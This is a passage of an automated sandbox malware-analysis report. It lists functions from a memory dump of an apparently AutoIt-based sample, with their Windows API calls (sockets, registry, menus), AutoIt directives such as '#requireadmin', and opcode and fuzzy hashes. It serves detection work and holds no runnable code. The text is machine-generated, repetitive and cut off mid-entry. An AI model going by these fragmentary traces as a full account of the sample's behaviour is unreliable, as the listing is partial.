                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 910771015-0
                                                      • Opcode ID: 6a9ac664916615de0ebc7265e148eabb40c7d3597edcccf9cac1aa24eaa8fea0
                                                      • Instruction ID: b728a0628da3978cd5133b5b8f81d6e97ac34da8a8d8265cf183412622125735
                                                      • Opcode Fuzzy Hash: 6a9ac664916615de0ebc7265e148eabb40c7d3597edcccf9cac1aa24eaa8fea0
                                                      • Instruction Fuzzy Hash: E031A471600518ABEF10AF28CC85BBD7BA9FF45725F048069FD09E7296DB70EC149B62
                                                      Function 0085F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                      • API String ID: 1038674560-2734436370
                                                      • Opcode ID: 698581fb9c8c681c1f4b9fbbbb70ac8461bf30a07536e95f75dea5f626305e57
                                                      • Instruction ID: a31fc20360f5e9f8752b457b1079e87144b7f979c9a03dc33958dfa8659ae400
                                                      • Opcode Fuzzy Hash: 698581fb9c8c681c1f4b9fbbbb70ac8461bf30a07536e95f75dea5f626305e57
                                                      • Instruction Fuzzy Hash: E82149722041617AD620B638AC02EA773DCFF69355F144439FE45C7193FB549D89C396
                                                      Function 008875CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00801D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00801D73
                                                        • Part of subcall function 00801D35: GetStockObject.GDI32(00000011), ref: 00801D87
                                                        • Part of subcall function 00801D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00801D91
                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00887632
                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0088763F
                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0088764A
                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00887659
                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00887665
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                      • String ID: Msctls_Progress32
                                                      • API String ID: 1025951953-3636473452
                                                      • Opcode ID: 7e2b15c0cd52bc163cd587818b3346769ea4a35743639d8a2e1e9a93198deae2
                                                      • Instruction ID: c7d02d9d76ff4576afe97d17bbdb552f929edbd693254a6cb6576027ce211b8f
                                                      • Opcode Fuzzy Hash: 7e2b15c0cd52bc163cd587818b3346769ea4a35743639d8a2e1e9a93198deae2
                                                      • Instruction Fuzzy Hash: AC1193B1110119BFEF159F64CC85EE77F6DFF087A8F114215BA04A21A0D6729C21DBA4
                                                      Function 00829AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __init_pointers.LIBCMT ref: 00829AE6
                                                        • Part of subcall function 00823187: RtlEncodePointer.NTDLL(00000000), ref: 0082318A
                                                        • Part of subcall function 00823187: __initp_misc_winsig.LIBCMT ref: 008231A5
                                                        • Part of subcall function 00823187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00829EA0
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00829EB4
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00829EC7
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00829EDA
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00829EED
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00829F00
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00829F13
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00829F26
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00829F39
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00829F4C
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00829F5F
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00829F72
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00829F85
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00829F98
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00829FAB
                                                        • Part of subcall function 00823187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00829FBE
                                                      • __mtinitlocks.LIBCMT ref: 00829AEB
                                                      • __mtterm.LIBCMT ref: 00829AF4
                                                        • Part of subcall function 00829B5C: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00829C56
                                                        • Part of subcall function 00829B5C: _free.LIBCMT ref: 00829C5D
                                                        • Part of subcall function 00829B5C: RtlDeleteCriticalSection.NTDLL(008BEC00), ref: 00829C7F
                                                      • __calloc_crt.LIBCMT ref: 00829B19
                                                      • __initptd.LIBCMT ref: 00829B3B
                                                      • GetCurrentThreadId.KERNEL32(00827CD0,008BA0B8,00000014), ref: 00829B42
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                      • String ID:
                                                      • API String ID: 3567560977-0
                                                      • Opcode ID: 8d7f408dedb5bcab9a94e047b8701e3a9e4d634ad9bcb034e8c235d24a97f083
                                                      • Instruction ID: da28ae99770fb7b27e6d45832ab80ed556cb0b42b42533803e13935d2222ea2d
                                                      • Opcode Fuzzy Hash: 8d7f408dedb5bcab9a94e047b8701e3a9e4d634ad9bcb034e8c235d24a97f083
                                                      • Instruction Fuzzy Hash: 12F090325197315EE634777CBC0768A3B90FF02730F200A29F4E5D51D2EF2184C145A6
                                                      Function 0082406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00823F85), ref: 00824085
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0082408C
                                                      • RtlEncodePointer.NTDLL(00000000), ref: 00824097
                                                      • RtlDecodePointer.NTDLL(00823F85), ref: 008240B2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                      • String ID: RoUninitialize$combase.dll
                                                      • API String ID: 3489934621-2819208100
                                                      • Opcode ID: 2da0cca4a536b67bfcf7bb78f418d7dd44ae38fd5f8017e6d7698d6cd9263bd8
                                                      • Instruction ID: afa1cfba3adc661ba952514908b3b6e73d5a96f64be03f26da845918f7b633ac
                                                      • Opcode Fuzzy Hash: 2da0cca4a536b67bfcf7bb78f418d7dd44ae38fd5f8017e6d7698d6cd9263bd8
                                                      • Instruction Fuzzy Hash: B9E0B670581310EFEB50AF66ED0DF453AB5F704742F18802AF211E12A1CBBA4645DB14
                                                      Function 00876B03 Relevance: 9.2, APIs: 6, Instructions: 250networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 00876C00
                                                      • WSAGetLastError.WS2_32(00000000), ref: 00876C34
                                                      • htons.WS2_32(?), ref: 00876CEA
                                                      • inet_ntoa.WS2_32(?), ref: 00876CA7
                                                        • Part of subcall function 0085A7E9: _strlen.LIBCMT ref: 0085A7F3
                                                        • Part of subcall function 0085A7E9: _memmove.LIBCMT ref: 0085A815
                                                      • _strlen.LIBCMT ref: 00876D44
                                                      • _memmove.LIBCMT ref: 00876DAD
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                      • String ID:
                                                      • API String ID: 3619996494-0
                                                      • Opcode ID: 98efe3eb3324b212d05ff11c95735742fda146c1e94643582daf85a1394ac84f
                                                      • Instruction ID: bc9ff6d1aa271db1d4f24c2947f6320d9bc8ba8b9140a6676a405fbabf58a16f
                                                      • Opcode Fuzzy Hash: 98efe3eb3324b212d05ff11c95735742fda146c1e94643582daf85a1394ac84f
                                                      • Instruction Fuzzy Hash: 6481C571204600AFD750EB28DC82E6BBBA8FF84724F148518F999DB2D2EA71DD44CB52
                                                      Function 008664B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _memmove$__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 3253778849-0
                                                      • Opcode ID: 026c13e68b39466d2ae94973b14515d0b3be80e7c79bda7406d5a8bdf8ab8ebf
                                                      • Instruction ID: 94b2b0012fcab326926fce53fcb0137c8b1b010e8d54a8e75899e93b37ddd14b
                                                      • Opcode Fuzzy Hash: 026c13e68b39466d2ae94973b14515d0b3be80e7c79bda7406d5a8bdf8ab8ebf
                                                      • Instruction Fuzzy Hash: E1619F7050029A9BCF01EF68DC82AFE37A5FF15308F058525F859AB293EB34A855CB52
                                                      Function 008801E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                        • Part of subcall function 00880E1A: CharUpperBuffW.USER32(?,?), ref: 00880E31
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008802BD
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008802FD
                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00880320
                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00880349
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0088038C
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00880399
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                      • String ID:
                                                      • API String ID: 4046560759-0
                                                      • Opcode ID: 0af07e27ac05bdb5a76fe2a84f9be75646c7242c8cdce7827567320df941fec5
                                                      • Instruction ID: 212bb1e227fcbcdd03c1f2a110467639112b77de26045a6f356068f358bada15
                                                      • Opcode Fuzzy Hash: 0af07e27ac05bdb5a76fe2a84f9be75646c7242c8cdce7827567320df941fec5
                                                      • Instruction Fuzzy Hash: 69513731208204AFCB51EB68C885E6ABBE8FF85314F04491DF995C72A2DB31E949CF52
                                                      Function 00885799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenu.USER32(?), ref: 008857FB
                                                      • GetMenuItemCount.USER32(00000000), ref: 00885832
                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0088585A
                                                      • GetMenuItemID.USER32(?,?), ref: 008858C9
                                                      • GetSubMenu.USER32(?,?), ref: 008858D7
                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00885928
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountMessagePostString
                                                      • String ID:
                                                      • API String ID: 650687236-0
                                                      • Opcode ID: 496d308c26aa6e611158e7f342b5a175b34e5f46f06682bdb1151a73e69370a0
                                                      • Instruction ID: 65b4d194dcc33464f2196413aff7430832e1c61f3ed30909752f9c25bec5e5da
                                                      • Opcode Fuzzy Hash: 496d308c26aa6e611158e7f342b5a175b34e5f46f06682bdb1151a73e69370a0
                                                      • Instruction Fuzzy Hash: 19515C75A00615EFCF11EF68C8459AEBBB4FF48320F104066E951EB352DB34AE418B91
                                                      Function 0085EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 0085EF06
                                                      • VariantClear.OLEAUT32(00000013), ref: 0085EF78
                                                      • VariantClear.OLEAUT32(00000000), ref: 0085EFD3
                                                      • _memmove.LIBCMT ref: 0085EFFD
                                                      • VariantClear.OLEAUT32(?), ref: 0085F04A
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0085F078
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                      • String ID:
                                                      • API String ID: 1101466143-0
                                                      • Opcode ID: 059022ca0c6a0ba9749c99d71125bb6f32f8e25eaa3d5638d64480b59a51dd44
                                                      • Instruction ID: 0bc2ebab6f0f7b1c0f833a27747e1099ae6cd9d172cb774d55cc941e51f6117c
                                                      • Opcode Fuzzy Hash: 059022ca0c6a0ba9749c99d71125bb6f32f8e25eaa3d5638d64480b59a51dd44
                                                      • Instruction Fuzzy Hash: 34515D75A00209DFCB14CF58C884AAAB7B8FF4C314B15856AEE59DB342E734E915CB90
                                                      Function 0086220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00862258
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008622A3
                                                      • IsMenu.USER32(00000000), ref: 008622C3
                                                      • CreatePopupMenu.USER32 ref: 008622F7
                                                      • GetMenuItemCount.USER32(000000FF), ref: 00862355
                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00862386
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                      • String ID:
                                                      • API String ID: 3311875123-0
                                                      • Opcode ID: fe69548f3f1326b37190c785f4b8f9d40073e3d982379026134b49132226bd89
                                                      • Instruction ID: 90c38ce3a5f1f3bc100eb1106d5137f9a82e1b666139aa4afeb6bf7c998bc2b5
                                                      • Opcode Fuzzy Hash: fe69548f3f1326b37190c785f4b8f9d40073e3d982379026134b49132226bd89
                                                      • Instruction Fuzzy Hash: 3F51BE70600A4ADBDF21CF68CA88BADBBF5FF05318F1141A9E811E73A1D7748944CB52
                                                      Function 00801765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • BeginPaint.USER32(?,?), ref: 0080179A
                                                      • GetWindowRect.USER32(?,?), ref: 008017FE
                                                      • ScreenToClient.USER32(?,?), ref: 0080181B
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0080182C
                                                      • EndPaint.USER32(?,?), ref: 00801876
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
